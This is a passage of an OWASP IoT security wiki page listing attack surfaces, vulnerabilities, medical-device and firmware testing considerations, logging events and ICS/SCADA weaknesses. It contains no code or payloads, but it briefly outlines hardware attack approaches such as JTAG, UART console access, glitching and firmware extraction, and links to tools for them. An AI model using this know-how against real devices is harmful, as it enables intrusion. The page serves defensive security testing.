* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
